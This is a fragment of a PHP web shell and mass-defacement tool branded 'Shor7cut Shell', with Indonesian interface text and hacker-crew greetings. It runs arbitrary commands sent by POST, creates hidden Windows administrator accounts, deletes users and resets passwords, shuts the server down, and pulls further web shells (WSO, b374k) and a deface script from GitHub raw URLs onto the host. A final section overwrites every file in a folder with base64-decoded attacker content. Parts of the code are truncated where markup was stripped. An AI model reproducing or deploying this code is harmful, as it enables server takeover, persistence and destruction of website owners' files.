"; if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { $status_os = 'Windows/Linux'; $status_work = 'Dapat Digunakan
'; } else { $status_os = 'Windows/Linux'; $status_work = 'Tidak Dapat Digunakan
'; } ?> Shor7cut Shell (Beta Killer)
     _    _
    (o)--(o)
   /.______.\   Code By SHOR7CUT | INDONESIA RAYA
   \________/   OS Server : ";?>
  ./        \.  Informasi :  
 ( .        , ) Info Tool : 
  \ \_\\//_/ /
   ~~  ~~  ~~
SHOR7CUT Shell (BETA KILLER)

-| Create RDP |-

Username : Password :

-| COMMAND |-

!Command :

!Modar Keun :

-{ Option }-

Username : Aksi :

-{ Download Tools }-

!KTools :
-----------------------------------{ INFO }------------------------------------

"; if($_POST['kshell']=="cmds"){ $perintah = $_POST["cmd"]; echo "
".shell_exec("$perintah");
}else 
if($_POST['kshell']=="matikan"){
shell_exec("shutdown -s /t 1");
echo "MODAR";
}else
if($_POST['kshell']=="1"){
	$r_user = $_POST['username'];
	$r_pass = $_POST['password'];
	$cmd_cek_user   = shell_exec("net user"); 
	if(preg_match("/$r_user/", $cmd_cek_user)){
		echo $gaya_root.$r_user." sudah ada".$o;
	}else {
	$cmd_add_user   = shell_exec("net user ".$r_user." ".$r_pass." /add");
    $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
    $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
    $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
    $cmd_add_groups4 = shell_exec("net localgroup Administrador ".$r_user." /add");
    $cmd_add_groups5 = shell_exec("net localgroup Admin ".$r_user." /add");
    $cmd_add_groups6 = shell_exec("net localgroup Invitado ".$r_user." /add");
        
    	if($cmd_add_user){
    		echo $gaya_root."[add user]-> ".$r_user." Berhasil".$o;
    	}else {
    		echo $gaya_root."[add user]-> ".$r_user." Gagal".$o;
    	}
    	if($cmd_add_groups1){
              echo $gaya_root."[add localgroup Administrators]-> ".$r_user." Berhasil".$o;
    	}else
    	if($cmd_add_groups2){
              echo $gaya_root."[add localgroup Administrator]-> ".$r_user." Berhasil".$o;
    	}else
        if($cmd_add_groups3){
              echo $gaya_root."[add localgroup Administrateur]-> ".$r_user." Berhasil".$o;
        }else
        if($cmd_add_groups4){
              echo $gaya_root."[add localgroup Administrador]-> ".$r_user." Berhasil".$o;
        }else
        if($cmd_add_groups5){
              echo $gaya_root."[add localgroup Administrador]-> ".$r_user." Berhasil".$o;
        }else
        if($cmd_add_groups6){
              echo $gaya_root."[add localgroup Administrador]-> ".$r_user." Berhasil".$o;
        }else {
    		  echo $gaya_root."[add localgroup]-> ".$r_user." Gagal - Contact Shor7sec".$o;
    	}
			  echo $gaya_root."[INFO PC]-> RDP IP ".$_SERVER["HTTP_HOST"]." Username : ".$r_user." Password : ".$r_pass." Berhasil".$o;

	}



}else if($_POST['kshell']=="2"){

if($_POST['aksi']=="1"){
 echo "
".shell_exec("net user");
}
else if($_POST['aksi']=="2"){
$username = $_POST['rusername'];
$cmd_cek_user   = shell_exec("net user");
	if (!empty($username)){
		if(preg_match("/$username/", $cmd_cek_user)){
		$cmd_add_user   = shell_exec("net user ".$username." /DELETE");
		if($cmd_add_user){ 
			echo $gaya_root."[remove user]-> ".$username." Berhasil".$o;
		}else {
			echo $gaya_root."[remove user]-> ".$username." gagal".$o;
		}
	}else {
		echo $gaya_root."[remove user]-> ".$username." Tidak ditemukan".$o;
	}
	}else {
		echo $gaya_root."[PESAN]-> Kamu lupa masukin Username yang akan di delete".$o;
	}
}
else if($_POST['aksi']=="3"){
$username = $_POST['rusername'];
$password = "shor7cut";
$cmd_cek_user   = shell_exec("net user");
	if (!empty($username)){
		if(preg_match("/$username/", $cmd_cek_user)){
			$cmd_add_user   = shell_exec("net user ".$username." shor7cut");
			if($cmd_add_user){
			echo $gaya_root."[change password]-> (".$username."|".$password.") Berhasil".$o;
		}else {
			echo $gaya_root."[change password]-> (".$username."|".$password.") GAGAL".$o;
		}
	}else
{
	echo $gaya_root."[PESAN]-> Username Tidak Ditemukan di server".$o;
}
}else
{
	echo $gaya_root."[PESAN]-> Kamu lupa masukin Username yang akan di delete".$o;
}
		
}



}if($_POST['kshell']=="3"){
if($_POST['download']=="1"){
$files = file_get_contents("https://raw.githubusercontent.com/ekasyahwan/php/master/k-mass%20deface.php");
$status = file_put_contents("k-mass.php", $files);
if($status){
	echo 'K-MASS DEFACE';
}else {
	echo 'Gagal Mendownload, PHP versi '.$phpv;
}
}else if($_POST['download']=="2"){
$files = file_get_contents("https://raw.githubusercontent.com/ekasyahwan/Bug7Sec/master/Minimonback-Bug7Sec/wso-bug7sec.php");
$status = file_put_contents("wso-bug7sec.php", $files);
if($status){
	echo 'Wso Bug7sec password : bug7sec';
}else {
	echo 'Gagal Mendownload, PHP versi '.$phpv;
}
}else if($_POST['download']=="3"){
$files = file_get_contents("https://raw.githubusercontent.com/ekasyahwan/php/master/b374k-28.php");
$status = file_put_contents("b374k-28.php", $files);
if($status){
	echo 'Wso Bug7sec password : bug7sec';
}else {
	echo 'Gagal Mendownload, PHP versi '.$phpv;
}
}
}
}	
?>


K-MASS DEFACE (KILLER) - SHOR7CUT

                 _
             ,.-" "-.,    
            /   ===   \      
           /  =======  \
        __|  (o)   (o)  |__      
       / _|    .---.    |_ \                  
      | /.----/ O O \----.\ |                 MASS DEFACE BY SHOR7CUT
       \/     |     |     \/                  _________.__                _________               __    
       |                   |                 /   _____/|  |__   __________\______  \ ____  __ ___/  |_  
       | CANGKEM MU COK!!! |                 /      \  |  |__\ /__________\______  \ ____  __ ___/  |_|            
       |                   |                 \_____  \ |  |  \ /  _ \_  __ \  /    // ___\|  |  \   __\ 
       _\   -.,_____,.-   /_                 /        \|   Y  (  <_> )  | \/ /    /\  \___|  |  /|  |  
   ,.-"  "-.,_________,.-"  "-.,            /_______  /|___|  /\____/|__|   /____/  \___  >____/ |__| 
  /          |       |          \                   \/      \/                          \/            
 |           l.     .l           |                                                           Thank's 
 |            |     |            |         
 l.           |     |           .l                             ______
  |           l.   .l           | \,                          |      |  ? shor7cut@localhost
  l.           |   |           .l   \,                        |___   |  ? http://localhost a.k.a 127.0.0.1
   |           |   |           |      \,                          |  |  ? I'am not hacker
   l.          |   |          .l        |                       __|  |  ? MERAH PUTIH
    |          |   |          |         |                      |_____|
    |          |---|          |         |                       __ 
    |          |   |          |                                |__|     
    /"-.,__,.-"\   /"-.,__,.-"\"-.,_,.-"\                        
   |            \ /            |         |
   |             |             |         |         K3CEB0NG - K3C0T - Mr. Error 404 - Tintonz - Tu5b0l3d - Nabilaholic404 - Mr. Xenophobic
    \__|__|__|__/ \__|__|__|__/ \_|__|__/               Jinja - Jingklong - Mbah Roni - ToAxR0ot - Penjaga Mayat - Hacker Sakit Hati - DayWalker
        HACKER NDA'S MU - SHO7CUT ()
Script Depes (Encode base64) : Folder :


 ".$files[$i]."
"; flush(); ob_flush(); sleep(1); } } } if(pathinfo($files[$i], PATHINFO_EXTENSION)){ echo $nama." --> Nyabun Selesai om
"; $content = base64_decode($_POST['script']); $fp = fopen($nama,"wb"); fwrite($fp,$content); fclose($fp); } flush(); ob_flush(); sleep(1); } $content = base64_decode($_POST['script']); $fp = fopen("cut.php","wb"); fwrite($fp,$content); fclose($fp); } ?>